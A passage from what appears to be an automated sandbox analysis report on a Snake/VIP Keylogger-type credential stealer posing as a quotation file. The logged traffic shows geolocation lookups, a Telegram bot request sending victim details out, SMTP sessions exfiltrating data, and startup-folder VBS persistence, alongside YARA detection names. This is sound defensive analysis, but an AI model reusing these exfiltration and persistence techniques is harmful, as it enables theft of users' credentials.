                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  14192.168.2.1049914104.21.96.14437432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:40 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-14 15:57:40 UTC855INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:40 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 2185050
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ZHAHdP8ssC8Ss%2BVD567R7iWsYMUhey8D3bHKijcNsa1ciqZ%2BSX8JGLjpMaXshIWgeecGXhctLZYUZ2MXHWAOKs0fqwF2DW1mvdtBLC4HiQrD9h3Aoe87S9TgAPZ8m8hLeT%2FDTVd"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 901ed2badcf672a4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2038&min_rtt=2033&rtt_var=773&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1406551&cwnd=212&unsent_bytes=0&cid=d44c06dd9b33ac0f&ts=145&x=0"
                                                                                                                  2025-01-14 15:57:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  15192.168.2.1049927104.21.96.14437432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:42 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-14 15:57:42 UTC859INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:42 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 2185051
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hd%2BqIxybZwTMLNx67F39QI7q6GCmKYzBGHc1xuv9Qsz1lqLdq%2BpqUVoxz4DkuJg4ENqzhdSEQbBriM%2BqDpl9EpcF58h6%2B7FYY0oY91BGSeViPYO2imQ8t4EPpp36mJ6R8oP4k%2Bve"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 901ed2c2fa511a48-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1960&rtt_var=753&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1435594&cwnd=157&unsent_bytes=0&cid=cfa872f39df32332&ts=139&x=0"
                                                                                                                  2025-01-14 15:57:42 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  16192.168.2.1049937104.21.96.14437432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:43 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  2025-01-14 15:57:43 UTC857INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:43 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 2185052
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qHFl85p7cdxBWtAYBEatoSxMM8T8QPXKmOi99R91P%2FW%2Bi7o5qaDKrZgU5xx1RQxL3eMx8qERiP494VLpF8MI%2F%2FGQ7HMmxD6Mxz0ikz69XVC3eOLKucCz34UmHqKXuU3zKWlGFJdU"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 901ed2cb3f4542c0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1620&rtt_var=621&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1744324&cwnd=212&unsent_bytes=0&cid=fae4185d2b0aa594&ts=173&x=0"
                                                                                                                  2025-01-14 15:57:43 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  17192.168.2.1049946104.21.96.14437432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:44 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-14 15:57:44 UTC856INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:44 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 2185053
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AVwpAcrtj8SEAP4HOU8Of4x0eA2wRuqodkl%2FedqVRmrd88I2R200HBYoWE%2FWgPFjE%2B1xw2nODhvnfRDmpIqiCVGP8IrJ8jZq8y7VbF7BZlkllLbBuRu3QTOcSjvOAcFTh97Wqj7V"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 901ed2d3584ade9a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2247&min_rtt=1771&rtt_var=1004&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1648785&cwnd=194&unsent_bytes=0&cid=c51cd220bff25a6e&ts=150&x=0"
                                                                                                                  2025-01-14 15:57:44 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  18192.168.2.1049958104.21.96.14437432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:46 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  2025-01-14 15:57:46 UTC853INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:46 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 2185055
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AWRE2KQisQ4UsOfet0pZf3hSg100EACrKiWW4B0wEJN6wlv36tWWbvHpmF73rZmv%2BJRkjF18neQm3nbRipGsneR7IFYMOMnrRmXKuYjlWGF2%2BcAFwFNn7CwsRq4VXe1VaJo51xSf"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 901ed2db9aa372a4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2056&min_rtt=2041&rtt_var=776&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1430671&cwnd=212&unsent_bytes=0&cid=61c4fa456a0488ff&ts=146&x=0"
                                                                                                                  2025-01-14 15:57:46 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  19192.168.2.1049962149.154.167.2204437432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:46 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2014/01/2025%20/%2023:22:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                  Host: api.telegram.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-14 15:57:47 UTC344INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:47 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 55
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  2025-01-14 15:57:47 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                  SMTP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                  Jan 14, 2025 16:57:41.558362961 CET58749918208.91.199.225192.168.2.10220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                  Jan 14, 2025 16:57:41.558599949 CET49918587192.168.2.10208.91.199.225EHLO 305090
                                                                                                                  Jan 14, 2025 16:57:41.705163002 CET58749918208.91.199.225192.168.2.10250-us2.outbound.mailhostbox.com
                                                                                                                  250-PIPELINING
                                                                                                                  250-SIZE 41648128
                                                                                                                  250-VRFY
                                                                                                                  250-ETRN
                                                                                                                  250-STARTTLS
                                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                                  250-AUTH=PLAIN LOGIN
                                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                                  250-8BITMIME
                                                                                                                  250-DSN
                                                                                                                  250 CHUNKING
                                                                                                                  Jan 14, 2025 16:57:41.706146955 CET49918587192.168.2.10208.91.199.225AUTH login ZGlyZWN0b3JAaWdha3Vpbi5jb20=
                                                                                                                  Jan 14, 2025 16:57:41.854944944 CET58749918208.91.199.225192.168.2.10334 UGFzc3dvcmQ6
                                                                                                                  Jan 14, 2025 16:57:42.009579897 CET58749918208.91.199.225192.168.2.10235 2.7.0 Authentication successful
                                                                                                                  Jan 14, 2025 16:57:42.009865999 CET49918587192.168.2.10208.91.199.225MAIL FROM:<director@igakuin.com>
                                                                                                                  Jan 14, 2025 16:57:42.158483028 CET58749918208.91.199.225192.168.2.10250 2.1.0 Ok
                                                                                                                  Jan 14, 2025 16:57:42.159833908 CET49918587192.168.2.10208.91.199.225RCPT TO:<director@igakuin.com>
                                                                                                                  Jan 14, 2025 16:57:42.329303980 CET58749918208.91.199.225192.168.2.10250 2.1.5 Ok
                                                                                                                  Jan 14, 2025 16:57:42.365375042 CET49918587192.168.2.10208.91.199.225DATA
                                                                                                                  Jan 14, 2025 16:57:42.512981892 CET58749918208.91.199.225192.168.2.10354 End data with <CR><LF>.<CR><LF>
                                                                                                                  Jan 14, 2025 16:57:42.523802042 CET49918587192.168.2.10208.91.199.225.
                                                                                                                  Jan 14, 2025 16:57:42.869824886 CET58749918208.91.199.225192.168.2.10250 2.0.0 Ok: queued as 4013E64018B
                                                                                                                  Jan 14, 2025 16:57:55.498307943 CET58750011208.91.199.225192.168.2.10220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                  Jan 14, 2025 16:57:55.498743057 CET50011587192.168.2.10208.91.199.225EHLO 305090
                                                                                                                  Jan 14, 2025 16:57:55.753878117 CET58750011208.91.199.225192.168.2.10250-us2.outbound.mailhostbox.com
                                                                                                                  250-PIPELINING
                                                                                                                  250-SIZE 41648128
                                                                                                                  250-VRFY
                                                                                                                  250-ETRN
                                                                                                                  250-STARTTLS
                                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                                  250-AUTH=PLAIN LOGIN
                                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                                  250-8BITMIME
                                                                                                                  250-DSN
                                                                                                                  250 CHUNKING
                                                                                                                  Jan 14, 2025 16:57:55.754164934 CET50011587192.168.2.10208.91.199.225AUTH login ZGlyZWN0b3JAaWdha3Vpbi5jb20=
                                                                                                                  Jan 14, 2025 16:57:55.909369946 CET58750011208.91.199.225192.168.2.10334 UGFzc3dvcmQ6
                                                                                                                  Jan 14, 2025 16:57:56.066633940 CET58750011208.91.199.225192.168.2.10235 2.7.0 Authentication successful
                                                                                                                  Jan 14, 2025 16:57:56.067053080 CET50011587192.168.2.10208.91.199.225MAIL FROM:<director@igakuin.com>
                                                                                                                  Jan 14, 2025 16:57:56.215243101 CET58750011208.91.199.225192.168.2.10250 2.1.0 Ok
                                                                                                                  Jan 14, 2025 16:57:56.216193914 CET50011587192.168.2.10208.91.199.225RCPT TO:<director@igakuin.com>
                                                                                                                  Jan 14, 2025 16:57:56.388755083 CET58750011208.91.199.225192.168.2.10250 2.1.5 Ok
                                                                                                                  Jan 14, 2025 16:57:56.393136978 CET50011587192.168.2.10208.91.199.225DATA
                                                                                                                  Jan 14, 2025 16:57:56.540721893 CET58750011208.91.199.225192.168.2.10354 End data with <CR><LF>.<CR><LF>
                                                                                                                  Jan 14, 2025 16:57:56.551393986 CET50011587192.168.2.10208.91.199.225.
                                                                                                                  Jan 14, 2025 16:57:56.897588968 CET58750011208.91.199.225192.168.2.10250 2.0.0 Ok: queued as 4E42464003C

                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:1
                                                                                                                  Start time:10:57:10
                                                                                                                  Start date:14/01/2025
                                                                                                                  Path:C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe"
                                                                                                                  Imagebase:0xf10000
                                                                                                                  File size:1'586'688 bytes
                                                                                                                  MD5 hash:F8410BCD14256D6D355D7076A78C074F
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:10:57:11
                                                                                                                  Start date:14/01/2025
                                                                                                                  Path:C:\Users\user\AppData\Local\supergroup\ageless.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe"
                                                                                                                  Imagebase:0xd60000
                                                                                                                  File size:1'586'688 bytes
                                                                                                                  MD5 hash:F8410BCD14256D6D355D7076A78C074F
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 39%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:3
                                                                                                                  Start time:10:57:13
                                                                                                                  Start date:14/01/2025
                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe"
                                                                                                                  Imagebase:0x4c0000
                                                                                                                  File size:45'984 bytes
                                                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:10:57:24
                                                                                                                  Start date:14/01/2025
                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs"
                                                                                                                  Imagebase:0x7ff7cf1e0000
                                                                                                                  File size:170'496 bytes
                                                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:10:57:31
                                                                                                                  Start date:14/01/2025
                                                                                                                  Path:C:\Users\user\AppData\Local\supergroup\ageless.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\supergroup\ageless.exe"
                                                                                                                  Imagebase:0xd60000
                                                                                                                  File size:1'586'688 bytes
                                                                                                                  MD5 hash:F8410BCD14256D6D355D7076A78C074F
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
